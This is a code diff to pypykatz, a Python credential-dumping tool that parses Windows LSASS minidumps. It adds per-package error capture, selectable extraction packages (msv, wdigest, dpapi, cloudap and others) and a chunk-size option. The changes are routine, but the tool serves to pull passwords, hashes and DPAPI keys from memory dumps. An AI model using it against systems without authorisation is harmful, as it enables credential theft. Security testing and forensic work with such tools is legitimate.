@@ -7,6 +7,8 @@
 import platform
 import json
 import asyncio
+import base64
+import traceback
 
 from pypykatz.commons.common import KatzSystemInfo
 from pypykatz.alsadecryptor import CredmanTemplate, MsvTemplate, \
@@ -35,6 +37,7 @@ class apypykatz:
 		
 		self.logon_sessions = {}
 		self.orphaned_creds = []
+		self.errors = []
 		self.kerberos_ccache = CCACHE()
 		
 	def to_dict(self):
@@ -46,6 +49,12 @@ class apypykatz:
 		t['orphaned_creds'] = []
 		for oc in self.orphaned_creds:
 			t['orphaned_creds'].append(oc.to_dict())
+		
+		t['errors'] = []
+		for pkg, err in self.errors:
+			err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
+			err_str = base64.b64encode(err_str.encode()).decode()
+			t['errors'].append((pkg,err_str))
 		return t
 		
 	def to_json(self):
@@ -66,6 +75,12 @@ class apypykatz:
 						t = cred.to_dict()
 						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
 						res += ':'.join(x) + '\r\n'
+				
+				for pkg, err in self.errors:
+					err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
+					err_str = base64.b64encode(err_str.encode()).decode()
+					x =  [pkg+'_exception_please_report', '', '', '', '', '', '', '', err_str]
+					res += ':'.join(x) + '\r\n'
 
 		return res
 
@@ -79,20 +94,27 @@ class apypykatz:
 			for cred in self.orphaned_creds:
 				res += str(cred) + '\r\n'
 		
+		if len(self.errors) > 0:
+			res += '== Errors ==\r\n'
+			for pkg, err in self.errors:
+				err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
+				err_str = base64.b64encode(err_str.encode()).decode()
+				res += '%s %s \r\n' % (pkg+'_exception_please_report',err_str) 
+		
 		return res
 		
 	@staticmethod
-	async def parse_minidump_file(filename):
+	async def parse_minidump_file(filename, packages = ['all'], chunksize=10*1024):
 		try:
 			minidump = await AMinidumpFile.parse(filename)
-			reader = minidump.get_reader().get_buffered_reader()
+			reader = minidump.get_reader().get_buffered_reader(chunksize)
 			sysinfo = KatzSystemInfo.from_minidump(minidump)
 		except Exception as e:
 			logger.exception('Minidump parsing error!')
 			raise e
 		try:
 			mimi = apypykatz(reader, sysinfo)
-			await mimi.start()
+			await mimi.start(packages)
 		except Exception as e:
 			#logger.info('Credentials parsing error!')
 			mimi.log_basic_info()
@@ -100,7 +122,7 @@ class apypykatz:
 		return mimi
 
 	@staticmethod
-	async def parse_minidump_external(handle):
+	async def parse_minidump_external(handle, packages = ['all'], chunksize=10*1024):
 		"""
 		Parses LSASS minidump file based on the file object.
 		File object can really be any object as longs as 
@@ -110,10 +132,10 @@ class apypykatz:
 		handle: file like object
 		"""
 		minidump = await AMinidumpFile.parse_external(handle)
-		reader = minidump.get_reader().get_buffered_reader()
+		reader = minidump.get_reader().get_buffered_reader(chunksize)
 		sysinfo = KatzSystemInfo.from_minidump(minidump)
 		mimi = apypykatz(reader, sysinfo)
-		await mimi.start()
+		await mimi.start(packages)
 		return mimi
 
 		
@@ -217,7 +239,7 @@ class apypykatz:
 			else:
 				self.orphaned_creds.append(cred)
 	
-	#async def get_kerberos(self):
+	#async def get_kerberos(self, with_tickets = True):
 	#	dec_template = KerberosTemplate.get_template(self.sysinfo)
 	#	dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)
 	#	await dec.start()
@@ -243,18 +265,57 @@ class apypykatz:
 			else:
 				self.orphaned_creds.append(cred)
 
-	async def start(self):
+	async def start(self, packages = ['all']):
 		#self.log_basic_info()
 		#input()
 		self.lsa_decryptor = await self.get_lsa()
-		await self.get_logoncreds()
-		await self.get_wdigest()
-		#await self.get_kerberos()
-		await self.get_tspkg()
-		await self.get_ssp()
-		await self.get_livessp()
-		await self.get_dpapi()
-		await self.get_cloudap()
+		if 'msv' in packages or 'all' in packages:
+			try:
+				await self.get_logoncreds()
+			except Exception as e:
+				self.errors.append(('msv', e))
+
+		if 'wdigest' in packages or 'all' in packages:
+			try:
+				await self.get_wdigest()
+			except Exception as e:
+				self.errors.append(('wdigest', e))
+		
+		#if 'kerberos' in packages or 'ktickets' in packages or 'all' in packages:
+		#	with_tickets = False
+		#	if 'ktickets' in packages or 'all' in packages:
+		#		with_tickets = True
+		#	await self.get_kerberos(with_tickets)
+		
+		if 'tspkg' in packages or 'all' in packages:
+			try:
+				await self.get_tspkg()
+			except Exception as e:
+				self.errors.append(('tspkg', e))
+		
+		if 'ssp' in packages or 'all' in packages:
+			try:
+				await self.get_ssp()
+			except Exception as e:
+				self.errors.append(('ssp', e))
+		
+		if 'livessp' in packages or 'all' in packages:
+			try:
+				await self.get_livessp()
+			except Exception as e:
+				self.errors.append(('livessp', e))
+		
+		if 'dpapi' in packages or 'all' in packages:
+			try:
+				await self.get_dpapi()
+			except Exception as e:
+				self.errors.append(('dpapi', e))
+		
+		if 'cloudap' in packages or 'all' in packages:
+			try:
+				await self.get_cloudap()
+			except Exception as e:
+				self.errors.append(('cloudap', e))
 
 async def amain():
 	from aiosmb.commons.connection.url import SMBConnectionURL
